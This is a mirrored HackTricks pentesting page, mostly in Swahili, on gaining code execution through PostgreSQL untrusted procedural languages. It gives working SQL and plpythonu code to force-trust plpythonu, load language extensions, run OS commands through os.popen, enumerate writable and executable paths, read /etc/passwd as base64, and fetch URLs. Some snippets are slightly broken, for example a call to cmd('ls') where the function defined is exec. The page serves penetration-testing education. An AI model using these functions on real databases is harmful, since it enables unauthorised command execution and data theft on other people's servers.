Mirrors/hacktricks

Fork 0

mirror of https://github.com/carlospolop/hacktricks synced 2024-12-12 14:22:56 +00:00

CPol 6857e6d270

GitBook: No commit message

2024-04-06 19:39:38 +00:00

9.2 KiB

Raw Blame History

RCE with PostgreSQL Languages

Jifunze kuhusu kuhack AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!

Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
Gundua The PEASS Family, mkusanyiko wetu wa kipekee wa NFTs
Pata swag rasmi ya PEASS & HackTricks
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au nifuatilie kwenye Twitter 🐦@carlospolopm.
Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwenye repo ya hacktricks na repo ya hacktricks-cloud.

Lugha za PostgreSQL

Hifadhidata ya PostgreSQL ambayo umepata ufikiaji inaweza kuwa na lugha za programu zilizosanikishwa ambazo unaweza kuzitumia kwa kutekeleza nambari yoyote.

Unaweza kuzipata zikifanya kazi:

\dL *

SELECT lanname,lanpltrusted,lanacl FROM pg_language;

Wengi wa lugha za skrini unazoweza kusakinisha kwenye PostgreSQL zina aina 2: iliyothaminiwa na isiyothaminiwa. Lugha isiyothaminiwa itakuwa na jina linalomalizika na "u" na itakuwa toleo ambalo litakuruhusu kutekeleza nambari na kutumia kazi nyingine za kuvutia. Hizi ni lugha ambazo zinavutia ikiwa zinasakinishwa:

plpythonu
plpython3u
plperlu
pljavaU
plrubyu
... (lugha nyingine yoyote ya programu inayotumia toleo lisilo salama)

{% hint style="warning" %} Ikiwa utagundua kuwa lugha ya kuvutia ime sakinishwa lakini isiyothaminiwa na PostgreSQL (lanpltrusted ni isiyo sahihi), unaweza kujaribu kuithamini na mstari ufuatao ili hakuna vizuizi vitakavyotekelezwa na PostgreSQL:

UPDATE pg_language SET lanpltrusted=true WHERE lanname='plpythonu';
# To check your permissions over the table pg_language
SELECT * FROM information_schema.table_privileges WHERE table_name = 'pg_language';

{% endhint %}

{% hint style="danger" %} Ikiwa huoni lugha, unaweza kujaribu kuipakia na (unahitaji kuwa superadmin):

CREATE EXTENSION plpythonu;
CREATE EXTENSION plpython3u;
CREATE EXTENSION plperlu;
CREATE EXTENSION pljavaU;
CREATE EXTENSION plrubyu;

{% endhint %}

Tafadhali kumbuka kuwa niwezekana kuunda toleo salama kama "lisilo salama". Angalia hii kama mfano. Kwa hivyo, ni vyema kujaribu ikiwa unaweza kutekeleza nambari hata ikiwa unapata tu imewekwa imani.

plpythonu/plpython3u

{% tabs %} {% tab title="undefined" %}

CREATE OR REPLACE FUNCTION exec (cmd text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.popen(cmd).read()
#return os.execve(cmd, ["/usr/lib64/pgsql92/bin/psql"], {})
$$
LANGUAGE 'plpythonu';

SELECT cmd("ls"); #RCE with popen or execve

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION get_user (pkg text)
RETURNS VARCHAR(65535) stable
AS $$
import os
return os.getlogin()
$$
LANGUAGE 'plpythonu';

SELECT get_user(""); #Get user, para is useless

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION lsdir (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import json
from os import walk
files = next(walk(dir), (None, None, []))
return json.dumps({"root": files[0], "dirs": files[1], "files": files[2]})[:65535]
$$
LANGUAGE 'plpythonu';

SELECT lsdir("/"); #List dir

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION findw (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
writables = []
def find_writable(path):
if not os.path.isdir(path):
return
if os.access(path, os.W_OK):
writables.append(path)
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_writable(os.path.join(path, item))
find_writable(path)
return writables

return ", ".join(my_find(dir))
$$
LANGUAGE 'plpythonu';

SELECT findw("/"); #Find Writable folders from a folder (recursively)

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION find_file (exe_sea text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find("/")
b = []

for i in a:
if exe_sea in os.path.basename(i):
b.append(i)
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT find_file("psql"); #Find a file

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION findx (dir text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path) and os.access(path, os.X_OK):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find(dir)
b = []

for i in a:
b.append(os.path.basename(i))
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT findx("/"); #Find an executables in folder (recursively)

{% endtab %}

{% tab title="Tafuta exec kwa kubadilisha" %}

CREATE OR REPLACE FUNCTION find_exe (exe_sea text)
RETURNS VARCHAR(65535) stable
AS $$
import os
def my_find(path):
executables = []
def find_executables(path):
if not os.path.isdir(path) and os.access(path, os.X_OK):
executables.append(path)

if os.path.isdir(path):
if not os.listdir(path):
return
else:
for item in os.listdir(path):
find_executables(os.path.join(path, item))
find_executables(path)
return executables

a = my_find("/")
b = []

for i in a:
if exe_sea in i:
b.append(i)
return ", ".join(b)
$$
LANGUAGE 'plpythonu';

SELECT find_exe("psql"); #Find executable by susbstring

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION read (path text)
RETURNS VARCHAR(65535) stable
AS $$
import base64
encoded_string= base64.b64encode(open(path).read())
return encoded_string.decode('utf-8')
return open(path).read()
$$
LANGUAGE 'plpythonu';

select read('/etc/passwd'); #Read a file in b64

{% endtab %}

{% tab title="undefined" %}

CREATE OR REPLACE FUNCTION get_perms (path text)
RETURNS VARCHAR(65535) stable
AS $$
import os
status = os.stat(path)
perms = oct(status.st_mode)[-3:]
return str(perms)
$$
LANGUAGE 'plpythonu';

select get_perms("/etc/passwd"); # Get perms of file

{% endtab %}

{% tab title="Ombi" %}

CREATE OR REPLACE FUNCTION req2 (url text)
RETURNS VARCHAR(65535) stable
AS $$
import urllib
r = urllib.urlopen(url)
return r.read()
$$
LANGUAGE 'plpythonu';

SELECT req2('https://google.com'); #Request using python2

CREATE OR REPLACE FUNCTION req3 (url text)
RETURNS VARCHAR(65535) stable
AS $$
from urllib import request
r = request.urlopen(url)
return r.read()
$$
LANGUAGE 'plpythonu';

SELECT req3('https://google.com'); #Request using python3

{% endtab %} {% endtabs %}

pgSQL

Angalia ukurasa ufuatao:

{% content-ref url="pl-pgsql-password-bruteforce.md" %} pl-pgsql-password-bruteforce.md {% endcontent-ref %}

C

Angalia ukurasa ufuatao:

{% content-ref url="rce-with-postgresql-extensions.md" %} rce-with-postgresql-extensions.md {% endcontent-ref %}

Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Je, unafanya kazi katika kampuni ya usalama wa mtandao? Je, ungependa kuona kampuni yako ikionekana katika HackTricks? Au ungependa kupata ufikiaji wa toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF? Angalia MPANGO WA KUJIUNGA!
Gundua The PEASS Family, mkusanyiko wetu wa kipekee wa NFTs
Pata swag rasmi wa PEASS & HackTricks
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram](https://t.me/peass) au nifuate kwenye Twitter 🐦@carlospolopm.
Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa repo ya hacktricks na repo ya hacktricks-cloud.

9.2 KiB Raw Blame History

RCE with PostgreSQL Languages

Lugha za PostgreSQL

plpythonu/plpython3u

pgSQL

C

9.2 KiB

Raw Blame History